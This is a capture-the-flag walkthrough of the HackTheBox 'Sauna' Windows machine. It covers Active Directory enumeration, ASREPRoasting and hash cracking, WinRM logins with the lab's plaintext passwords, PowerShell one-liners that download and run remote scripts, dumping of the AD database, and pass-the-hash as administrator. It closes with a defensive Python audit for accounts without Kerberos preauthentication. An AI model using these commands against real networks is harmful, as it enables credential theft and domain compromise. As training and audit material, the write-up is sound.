03 Jan 2020


Sauna is an easy-difficulty Windows machine from HackTheBox. It covers Active Directory enumeration techniques and CVE exploitation, for training your ethical hacking and penetration testing skills.

Possible usernames can be found on the website and used in an ASREPRoasting attack. A password hash is obtained, and the plaintext password is recovered by an offline brute-force attack. This user's credentials allow WinRM access to the box.

Running WinPEAS reveals a possible path for privilege escalation (PE): the output shows that a system user has been configured to log in automatically, and this user has Windows Remote Management permissions.

Target Machine:

Attacking (Hacker) machine:

Penetrating Methodology:

Service Scanning

  • Nmap

  • Nikto

  • Dirb

  • ldapsearch

  • nmap -p 88 --script krb5-enum-users

  • nmap -p 389 --script ldap-rootdse

  • Ysoserial

Getting Less Privilege Shell

  • Sherlock

  • Windows-Exploit-Suggester

Hacking Process Part 0 – Service Scanning

The target machine IP is

Get a basic understanding of the services available on the target machine by running an aggressive nmap scan against all ports.

0.1) Detailed Analysis

nmap -n -sV -vv --open -Pn -p- -A --reason -oN nmap.txt sauna.htb

Enumeration strategies

  1. Check Website Vulnerability

  2. Check any hidden files/folders of the website

  3. Check SMB

Hacking Process Part 1 – Enumeration

1.1) Strategy 1 Check Vulnerability

Nikto finds no vulnerability that can be abused to bypass authentication.

1.2) Strategy 2 Check any hidden files/folders of the website

python3 /root/Documents/ctf/tools/dirsearch/ -u -e php,txt -x 301,302,403,404 --simple-report=mrRobot.dirsearch

1.3) LDAP

nmap -p 389 --script ldap-rootdse sauna.htb


nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.local' sauna.htb

ldapsearch -x -h sauna.htb -b "DC=EGOTISTICAL-BANK,DC=local"


shauncoins,scooin, shaunc

hugobear,hbear, hugob

bowietaylor,btaylor, bowiet

sophiedriver,sdriver, sophied


/usr/share/doc/python3-impacket/examples/ EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt -no-pass -outputfile getNPUsers.result -dc-ip sauna.htb

john --format=krb5asrep --wordlist=/usr/share/wordlists/rockyou.txt fsmith.tgt

fsmith: Thestrokes23

Hacking Process Part 2 – Get Low Privilege Access

2.1) OAuth Token Exploitation

smbmap -u fsmith -p Thestrokes23 -H sauna.htb -R

No user.txt found in the share folders.


evil-winrm.rb -u fsmith -p Thestrokes23 -i sauna.htb

Hacking Process Part 3 – Windows Privilege Escalation

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString(''); Find-AllVulns -Command 'start powershell.exe'"

No vulnerable items found.

powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('')"

/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmanager -p Moneymakestheworldgoround! -i sauna.htb

incorrect user name

/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i sauna.htb

/usr/share/doc/python3-impacket/examples/ 'svc_loanmgr:Moneymakestheworldgoround!@sauna.htb'


/root/Documents/ctf/tools/win/evil-winrm/evil-winrm.rb -u administrator --hash 500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff -i



At the start, GetNPUsers dumped a hash because the fsmith account happened to have "Do not require Kerberos preauthentication" checked, so that account could be used to request a ticket and dump the hash. The account also happened to use a weak password that could be cracked, which is how the user flag was obtained.

Root: the svc_loanmgr service account can read the AD database, so the database was dumped and all the hashes obtained.

By default "Do not require Kerberos preauthentication" is not checked; it is usually set when an application does not support Kerberos, so it is something that needs to be audited.
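As an added example (not part of the original writeup), the following script audits ldapsearch-style output for accounts that have the "Do not require Kerberos preauthentication" bit (0x400000) set in userAccountControl, which is the setting that made the fsmith account ASREPRoastable. The LDIF sample embedded below is constructed, and the account names and flag values in it are illustrative only.

```python
# Added example: audit an ldapsearch dump for accounts whose userAccountControl
# has ADS_UF_DONT_REQUIRE_PREAUTH set. Constants are the documented AD bit values.
UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed sample output (not a real dump). 66048 = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD;
# 4260352 adds DONT_REQUIRE_PREAUTH; 4260354 additionally has ACCOUNTDISABLE set.
SAMPLE_LDIF = """\
dn: CN=fsmith,CN=Users,DC=EGOTISTICAL-BANK,DC=local
sAMAccountName: fsmith
userAccountControl: 4260352

dn: CN=hbear,CN=Users,DC=EGOTISTICAL-BANK,DC=local
sAMAccountName: hbear
userAccountControl: 66048

dn: CN=svc_legacy,CN=Users,DC=EGOTISTICAL-BANK,DC=local
sAMAccountName: svc_legacy
userAccountControl: 4260354
"""


def parse_ldif(text):
    """Split ldapsearch output into entries: dicts of lowercased attribute -> value."""
    entries, current = [], {}
    for line in text.splitlines():
        if not line.strip():          # blank line terminates an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#") or ":" not in line:
            continue                  # ldapsearch comments and result lines
        key, _, value = line.partition(":")
        current[key.strip().lower()] = value.strip()
    if current:
        entries.append(current)
    return entries


def find_preauth_disabled(text):
    """Return [(sAMAccountName, is_enabled)] for accounts that do not require preauth."""
    findings = []
    for entry in parse_ldif(text):
        uac = entry.get("useraccountcontrol", "")
        if not uac.isdigit():
            continue
        flags = int(uac)
        if flags & UF_DONT_REQUIRE_PREAUTH:
            enabled = not (flags & UF_ACCOUNTDISABLE)
            findings.append((entry.get("samaccountname", "?"), enabled))
    return findings


if __name__ == "__main__":
    for sam, enabled in find_preauth_disabled(SAMPLE_LDIF):
        print(f"{sam}: Kerberos preauth not required ({'ENABLED' if enabled else 'disabled'})")
```

Enabled hits are the ones to fix first; on a domain controller the same check can be done with the AD module's Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true'.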

